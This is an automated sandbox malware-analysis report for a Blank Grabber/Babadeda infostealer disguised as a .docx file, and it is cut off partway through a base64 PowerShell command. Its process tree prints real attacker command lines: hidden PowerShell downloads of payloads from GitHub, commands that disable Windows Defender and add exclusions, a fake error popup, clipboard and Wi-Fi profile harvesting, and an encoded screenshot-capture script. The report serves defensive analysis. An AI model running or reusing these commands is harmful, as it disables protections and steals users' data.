Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Cooperative Agreement0000800380.docx.exe

Overview

General Information

Sample name:Cooperative Agreement0000800380.docx.exe
Analysis ID:1569492
MD5:24ffda8b313b8867568168889eda370f
SHA1:dbdc131878ae66320104bcd33cc32021df45eb72
SHA256:759a3f120cd0280ec88cbd5ad614eeffb89d3a0cf65421f6bf7faf787a7dc282
Tags:exeuser-James_inthe_box
Infos:

Detection

Babadeda, Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Sigma detected: Suspicious Double Extension File Execution
Yara detected Babadeda
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses an obfuscated file name to hide its real file extension (double extension)
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Too many similar processes found
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Cooperative Agreement0000800380.docx.exe (PID: 6808 cmdline: "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe" MD5: 24FFDA8B313B8867568168889EDA370F)
    • cmd.exe (PID: 3852 cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmp\4715.bat "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5216 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 280 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/poh21/releases/download/hu23/chost.exe/' -outfile chost.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • dllhost.exe (PID: 5680 cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • calc.exe (PID: 5436 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • chost.exe (PID: 4336 cmdline: chost.exe MD5: 78F52BE4313947325B63CDB27B35C6DC)
        • chost.exe (PID: 280 cmdline: chost.exe MD5: 78F52BE4313947325B63CDB27B35C6DC)
          • cmd.exe (PID: 7264 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7448 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 7272 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7416 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
            • MpCmdRun.exe (PID: 3704 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
          • cmd.exe (PID: 7288 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The application cannot open the file due to an unknown error. Please try again.', 0, 'Cannot Open File', 48+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • mshta.exe (PID: 7408 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The application cannot open the file due to an unknown error. Please try again.', 0, 'Cannot Open File', 48+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
          • cmd.exe (PID: 7636 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 7688 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • cmd.exe (PID: 7716 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 7768 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • cmd.exe (PID: 7924 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 7984 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • cmd.exe (PID: 8012 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 8068 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • cmd.exe (PID: 8080 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 8132 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • cmd.exe (PID: 8164 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 2852 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • cmd.exe (PID: 7300 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 480 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 7760 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 2872 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • cmd.exe (PID: 7744 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 7352 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • cmd.exe (PID: 7600 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 7928 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • cmd.exe (PID: 7384 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7968 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 7264 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 7924 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • cmd.exe (PID: 7684 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tree.com (PID: 7980 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
          • cmd.exe (PID: 7488 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • netsh.exe (PID: 7972 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • cmd.exe (PID: 7800 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • systeminfo.exe (PID: 2304 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • cmd.exe (PID: 8104 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 5216 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • cmd.exe (PID: 5724 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7320 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAc